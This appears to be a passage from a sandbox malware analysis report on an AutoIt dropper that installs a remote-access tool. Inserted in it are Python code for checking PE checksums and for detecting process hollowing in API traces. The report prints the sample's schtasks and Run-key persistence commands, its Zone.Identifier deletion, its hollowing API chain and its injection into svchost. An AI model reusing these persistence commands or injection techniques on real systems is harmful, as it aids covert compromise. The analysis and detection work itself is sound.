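DOS_E_LFANEW = 0x3C          # offset of e_lfanew in IMAGE_DOS_HEADER
COFF_HEADER_SIZE = 20        # sizeof(IMAGE_FILE_HEADER)
OPT_CHECKSUM_OFFSET = 0x40   # CheckSum inside IMAGE_OPTIONAL_HEADER (same for PE32 and PE32+)


def checksum_field_offset(data: bytes) -> int:
    """Return the file offset of OptionalHeader.CheckSum, validating the headers on the way."""
    if len(data) < DOS_E_LFANEW + 4 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, DOS_E_LFANEW)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: bad PE signature")
    field = e_lfanew + 4 + COFF_HEADER_SIZE + OPT_CHECKSUM_OFFSET
    if field + 4 > len(data):
        raise ValueError("optional header truncated")
    return field


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Windows PE checksum: ones'-complement sum of every 16-bit word of the file,
    with the 4-byte CheckSum field excluded, folded to 16 bits, plus the file length."""
    padded = data + (b"\0" if len(data) % 2 else b"")
    total = 0
    for off in range(0, len(padded), 2):
        if off in (checksum_offset, checksum_offset + 2):
            continue                                   # the field being computed is skipped
        total += int.from_bytes(padded[off:off + 2], "little")
        total = (total & 0xFFFF) + (total >> 16)       # fold the carry back in
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def check_pe_checksum(data: bytes) -> tuple:
    """(stored, computed): the pair the report prints as 'real checksum: X should be: Y'."""
    field = checksum_field_offset(data)
    (stored,) = struct.unpack_from("<I", data, field)
    return stored, pe_checksum(data, field)


def set_checksum(data: bytes, value: int) -> bytes:
    """Write a CheckSum into the optional header (what a linker does at the end of a build)."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(data), value)
    return bytes(buf)


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image (headers plus filler), not a real binary.
    CheckSum is left at 0, the state the report flags as 'real checksum: 0x0'."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, DOS_E_LFANEW, e_lfanew)
    # Machine=i386, 1 section, no timestamp/symbols, SizeOfOptionalHeader=224, EXECUTABLE|32BIT
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)              # PE32 magic
    filler = bytes(range(256)) * 2                     # stands in for section data
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + filler


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    stored, computed = check_pe_checksum(data)
    print(f"real checksum: {stored:#x} should be: {computed:#x}")
```

Run it with a path argument to check a real dropped file; without one it checks the constructed image, whose stored value is 0 exactly like windef.exe above. Patching the computed value back in with `set_checksum` and re-running yields a match, which is the property a correct implementation must have since the field is excluded from its own sum.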

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (31).png
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 8000
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\windef.exe | File opened: C:\Users\user\AppData\Local\Temp\windef.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\windef.exe | File opened: C:\Users\user\AppData\Roaming\SubDir\winsock.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00DB48D7
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,5_2_00C83CC0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C8143C IsIconic,GetLastActivePopup,5_2_00C8143C
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C821C8 IsIconic,5_2_00C821C8
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7CDE8 IsIconic,memset,GetWindow,GetWindow,5_2_00C7CDE8
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7B764 GetWindowLongPtrA,IsIconic,5_2_00C7B764
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,7_2_00DB48D7
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00A448D7
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DD3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00DD3187
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 4128 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 5872 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Thread delayed: delay time: 922337203685477
Source: SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp | Binary or memory string: vmtoolsd.exe
Source: svchost.exe, 00000005.00000000.720666690.0000020DCBE1F000.00000004.00000001.sdmp, windef.exe, 00000006.00000002.720199755.0000000005849000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00DB49A0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_00E1445A
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,5_2_00C7FDA0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,5_2_00C76554
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,5_2_00C7FFA8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,7_2_00E1445A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,7_2_00413030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,7_2_004119A8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,7_2_004119AC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,7_2_00412D6C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,7_2_0041160C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,7_2_00413F58
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00AA445A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,1_2_00DB4B37
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h] 1_3_037F00BE
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00407AF0 mov eax, dword ptr fs:[00000030h] 7_2_00407AF0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h] 10_3_014C00BE
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00DB3B3A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DE5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00DE5A7C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DE97A2 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_00DE97A2
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process token adjusted: Debug
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C9A002 LdrLoadDll,5_2_00C9A002
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00DDA155
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00DDA155
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A6A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00A6A155

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: D00000 protect: page execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Memory written: C:\Users\user\Desktop\CVbJSUXraQ.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Memory written: C:\Users\user\btpanui\SystemPropertiesPerformance.exe base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_3_037F00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,1_3_037F00BE
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Memory written: C:\Windows\System32\svchost.exe base: D00000
.NET source code references suspicious native API functions
Source: winsock.exe.6.dr, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs | Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: winsock.exe.6.dr, ??uf019??u2720???uf88au171b???????u222f?.cs | Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs | Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs | Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs | Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs | Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Thread register set: target process: 5200
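The call list in the "Contains functionality to inject code into remote processes" entry (CreateProcessW, GetThreadContext, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread) is the classic process-hollowing chain, and the "Memory written ... base: 400000 value starts with: 4D5A" entries are the sandbox catching the MZ header of a new image landing in the suspended child (here a copy of the dropper itself, which is why source and target carry the same file name). The vnc.exe entries show the same primitives aimed at svchost.exe. The following added example, which is not part of the report and not Joe Sandbox code, shows how a detection engineer would turn that into logic over an API-call trace: it tracks an ordered chain per (injector, victim) pair and reports hollowing once the chain completes, and separately flags any cross-process write whose buffer begins with MZ. The trace it runs on is constructed after the report's call list; the event model attributes thread-handle calls (GetThreadContext, SetThreadContext, ResumeThread) to the owning process, which is an assumption of this example, and the field and function names are chosen here.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ApiEvent:
    pid: int                        # calling process
    api: str
    target: Optional[int] = None    # process the call acts on (None: the caller itself)
    flags: str = ""                 # e.g. CREATE_SUSPENDED on CreateProcessW
    data: bytes = b""               # buffer handed to WriteProcessMemory


# Ordered chain of a classic hollowing. Matching is by ordered subsequence, so the extra
# ReadProcessMemory / VirtualProtectEx / second WriteProcessMemory seen in the report do not
# break the match.
HOLLOWING_CHAIN = ["CreateProcessW", "GetThreadContext", "VirtualAllocEx",
                   "WriteProcessMemory", "SetThreadContext", "ResumeThread"]


def detect_hollowing(trace: List[ApiEvent]) -> List[dict]:
    """One finding per (injector, victim) pair whose call sequence completes HOLLOWING_CHAIN."""
    progress = {}       # (injector, victim) -> index of the next API expected
    pe_written = set()  # pairs where a buffer starting with MZ was written into the victim
    findings = []
    for ev in trace:
        key = (ev.pid, ev.target)
        if ev.api == "CreateProcessW" and "CREATE_SUSPENDED" in ev.flags and ev.target is not None:
            progress[key] = 1                   # suspended child: the chain starts here
            continue
        if key not in progress:
            continue                            # calls on self or on untracked processes
        if ev.api == "WriteProcessMemory" and ev.data[:2] == b"MZ":
            pe_written.add(key)
        if ev.api == HOLLOWING_CHAIN[progress[key]]:
            progress[key] += 1
        if progress[key] == len(HOLLOWING_CHAIN):
            findings.append({"injector": ev.pid, "victim": ev.target,
                             "pe_image_written": key in pe_written,
                             "technique": "process hollowing"})
            del progress[key]
    return findings


def foreign_pe_writes(trace: List[ApiEvent]) -> List[dict]:
    """Any WriteProcessMemory into another process whose buffer starts with an MZ header
    (the report's 'value starts with: 4D5A'), regardless of how the target was obtained."""
    return [{"injector": ev.pid, "victim": ev.target, "size": len(ev.data)}
            for ev in trace
            if ev.api == "WriteProcessMemory" and ev.target not in (None, ev.pid)
            and ev.data[:2] == b"MZ"]


def sample_trace() -> List[ApiEvent]:
    """Constructed trace: pid 1 hollows its own suspended copy (pid 7), following the
    1_3_037F00BE call list; pid 2 is a benign control that starts pid 9 and waits for it."""
    image = b"MZ" + bytes(62) + b"PE\0\0"
    return [
        ApiEvent(1, "CreateProcessW", target=7, flags="CREATE_SUSPENDED"),
        ApiEvent(1, "GetThreadContext", target=7),
        ApiEvent(1, "ReadProcessMemory", target=7),
        ApiEvent(1, "VirtualAlloc"),
        ApiEvent(1, "VirtualAllocEx", target=7),
        ApiEvent(1, "WriteProcessMemory", target=7, data=image),        # headers: starts with MZ
        ApiEvent(1, "VirtualProtectEx", target=7),
        ApiEvent(1, "VirtualProtectEx", target=7),
        ApiEvent(1, "VirtualFree"),
        ApiEvent(1, "WriteProcessMemory", target=7, data=bytes(16)),    # section data
        ApiEvent(1, "SetThreadContext", target=7),
        ApiEvent(1, "ResumeThread", target=7),
        ApiEvent(2, "CreateProcessW", target=9),
        ApiEvent(2, "WaitForSingleObject", target=9),
    ]


if __name__ == "__main__":
    for f in detect_hollowing(sample_trace()):
        print(f)
    print(foreign_pe_writes(sample_trace()))
```

Requiring the chain to end in ResumeThread is what separates hollowing from a debugger or a crash handler that also reads and writes a suspended child; the separate MZ-write check is kept because the same 4D5A signal fires when the target was obtained with OpenProcess rather than created suspended, as with the vnc.exe to svchost.exe writes above.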
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00DB48D7
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00DB3B3A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E0874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00E0874B
Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: Program Manager
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe | Binary or memory string: Shell_TrayWnd
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: GetProgmanWindow
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: Progman
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, svchost.exe, 00000005.00000000.720749842.0000020DCC390000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.942639016.0000000001DD0000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.942828030.00000000029A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: CVbJSUXraQ.exe, 00000001.00000002.944000384.00000000016FA000.00000004.00000001.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp | Binary or memory string: [CLASS:Progman]
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgrversion.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
